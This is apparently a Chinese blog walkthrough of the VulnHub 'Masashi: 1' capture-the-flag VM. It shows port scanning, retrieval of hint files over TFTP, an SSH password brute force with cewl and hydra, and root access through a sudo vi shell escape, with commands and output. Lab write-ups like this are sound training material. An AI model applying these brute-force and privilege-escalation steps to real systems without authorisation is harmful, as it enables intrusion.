当前位置:网站首页>Masashi: 1 vulnhub walkthrough
Masashi: 1 vulnhub walkthrough
2022-08-02 03:25:00 【xdeclearn】
Masashi: 1
虚拟机信息:http://www.vulnhub.com/entry/masashi-1,599/
0x01. 信息收集获取shell
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
80/tcp open http Apache httpd 2.4.38 ((Debian))
tcp端口只开放了22和80,访问80为apache介绍页面,于是使用dirb爬取一下目录,发现了robots.txt。
User-agent: *
Disallow: /
/snmpwalk.txt
/sshfolder.txt
/security.txt
访问得到snmpwalk.txt
,得到了提示访问服务器的tftp服务。
| 403:
| Name: cron
| Path: /usr/sbin/cron
| Params: -f
| 768:
| Name: tftpd
| Path: /usr/sbin/tftpd
| Params: -- listen — user tftp -- address 0.0.0.0:1337 -- secure /srv/tftp
| 806:
| Name: mysqld
| Path: /usr/sbin/mysqld
| Params: -i 0.0.0.0
sshfolder.txt
,得到了用户名sv5
[email protected]:~/srv/tftp# ls -la
total 20
drwx------ 2 sv5 sv5 4096 Oct 15 19:34 .
drwxr-xr-x 27 sv5 sv5 4096 Oct 21 12:37 ..
-rw------- 1 sv5 sv5 2602 Oct 15 19:34 id_rsa
-rw-r--r-- 1 sv5 sv5 565 Oct 15 19:34 id_rsa.pub
[email protected]:~/srv/tftp#
于是使用tftp client访问得到id_rsa
,id_rsa.pub
。
[email protected]:~$ tftp 192.168.56.120 1337
tftp> get id_rsa
Received 67 bytes in 0.0 seconds
tftp> get id_rsa.pub
Received 108 bytes in 0.0 seconds
tftp> quit
[email protected]:~$ cat id_rsa
So if you cant use the key then what else can you use????????? :)
[email protected]:~$ cat id_rsa.pub
Dude seriously, The key doesnt work here, try the other cewl thing here "/index.html"..... Wink ;) Wink ;)
按照提示,爬取主页作为字典去爆破用户sv5
的密码,得到密码whoistheplug
。
[email protected]:~$ cewl http://192.168.56.120 > 1.txt
[email protected]:~$ cat 1.txt |wc -l
239
[email protected]:~$ hydra -l sv5 -P 1.txt ssh://192.168.56.120 -t 4
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-12-01 21:13:45
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 4 tasks per 1 server, overall 4 tasks, 238 login tries (l:1/p:238), ~60 tries per task
[DATA] attacking ssh://192.168.56.120:22/
[22][ssh] host: 192.168.56.120 login: sv5 password: whoistheplug
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-12-01 21:20:37
成功登录获取shell。
[email protected]:~$ cat user.txt
Hey buddy :)
Well done on that initial foothold ;) ;)
Key Takeaways:
* Do not always believe what the tool tells you, be the "Doubting Thomas" sometimes and look for
yourself, e.g 1 disallowed entry in robots.txt wasn't really true was it? hehehehe
* It's not always about TCP all the time..... UDP is there for a reason and is just as important a
protocol as is TCP......
* Lastly, there is always an alternative to everything i.e the ssh part.
***** Congrats Pwner ******
Now on to the privesc now ;)
##Creator: Donald Munengiwa
##Twitter: @lorde_zw
0x02. 获取root
运行sudo -l
发现该用户可以任意用户执行vi,按esc
后输入:!/bin/bash
直接提权至root
。
[email protected]:~$ sudo -l
Matching Defaults entries for sv5 on masashi:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User sv5 may run the following commands on masashi:
(ALL) NOPASSWD: /usr/bin/vi /tmp/*
[email protected]:~$ sudo -u root /usr/bin/vi /tmp/1.txt
[email protected]:/home/sv5# cat /root/root.txt
Quite the pwner huh!!!! :)
Well i bet you had fun ;) ;)
Key Takeaways:
* Well, this time i'll leave it to you to tell me what you though about the overall experience you
had from this challenge.
* Let us know on Twitter @lorde_zw or on linkedIn @Sv5
****** Congrats Pwner ******
If you've gotten this far, please DM your Full name, Twitter Username, LinkedIn Username,
the flag [th33p1nplugg] and your country to the Twitter handle @lorde_zw ..... I will do a
shoutout to all the pnwers who completed the challenge.....
Follow us for more fun Stuff..... Happy Hacktober Pwner (00=[][]=00)
##Creator: Donald Munengiwa
##Twitter: @lorde_zw
边栏推荐
- [mikehaertl/php-shellcommand] A library for invoking external command operations
- IP access control: teach you how to implement an IP firewall with PHP
- hackmyvm: juggling walkthrough
- PHP 给图片添加全图水印
- 百度定位js API
- AES加密的各种蛋疼方式方式
- uniapp | 使用npm update更新后编译报错问题
- Solve the problem of uni - app packaged H5 website to download image
- PHP Foundation March Press Announcement Released
- vim编辑模式
猜你喜欢
随机推荐
JS objects, functions and scopes
PHP8.2 version release administrator and release plan
[league/climate] A robust command-line function manipulation library
查询数据库中所有表的索引,并且解析成sql
(3)Thinkphp6数据库
Phpstudy installs Thinkphp6 (problem + solution)
MySql高级 -- 约束
你的本地创建的项目库还在手动创建远端代码仓库再推送吗,该用它了
TCP communications program
hackmyvm: may walkthrough
4. PHP array and array sorting
Advanced Operations on Arrays
js 中this指向
Turn trendsoft/capital amount of Chinese capital library
PHP 发起支付宝支付时 订单信息乱码解决
面试总结 22/7/22 面试中的重点
2.PHP变量、输出、EOF、条件语句
Scrapy爬虫遇见重定向301/302问题解决方法
3. PHP data types, constants, strings and operators
easyswoole 使用redis执行geoRadiusByMember Count无效修复